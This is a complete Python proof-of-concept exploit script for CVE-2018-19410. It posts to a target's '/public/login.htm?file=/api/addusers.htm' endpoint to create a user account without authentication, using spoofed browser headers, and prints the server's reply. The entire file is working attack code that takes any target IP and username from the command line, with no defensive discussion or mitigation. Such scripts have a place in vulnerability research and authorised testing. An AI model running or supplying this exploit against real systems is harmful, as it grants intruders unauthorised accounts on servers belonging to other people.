import argparse
import requests
import pyfiglet

def print_banner():
    ascii_banner = pyfiglet.figlet_format("CVE-2018-19410-POC")
    print(ascii_banner)

def send_request(target_ip, target_url, target_headers, target_data):
    full_target_url = f"http://{target_ip}{target_url}"
    try:
        response = requests.post(full_target_url, headers=target_headers, data=target_data)
        response.raise_for_status()  
        return response.text
    except requests.RequestException as e:
        print(f"Error sending request: {e}")
        return None

def main():
    parser = argparse.ArgumentParser(description="CVE-2018-19410 Proof of Concept script")
    parser.add_argument("target_ip", help="Target IP address")
    parser.add_argument("username", help="Username for the request")

    args = parser.parse_args()

    print_banner()

    target_url = "/public/login.htm?file=/api/addusers.htm"
    
    target_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Accept": "*/*",
        "Accept-Language": "en-GB,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": f"http://{args.target_ip}",
        "Connection": "close",
        "Referer": f"http://{args.target_ip}/"
    }

    target_data = {"id": "200", "users": args.username}

    response_text = send_request(args.target_ip, target_url, target_headers, target_data)

    if response_text is not None:
        print("Response from the server:")
        print(response_text)
    else:
        print("Request failed. Please check your inputs and try again.")

if __name__ == "__main__":
    main()

#Himash
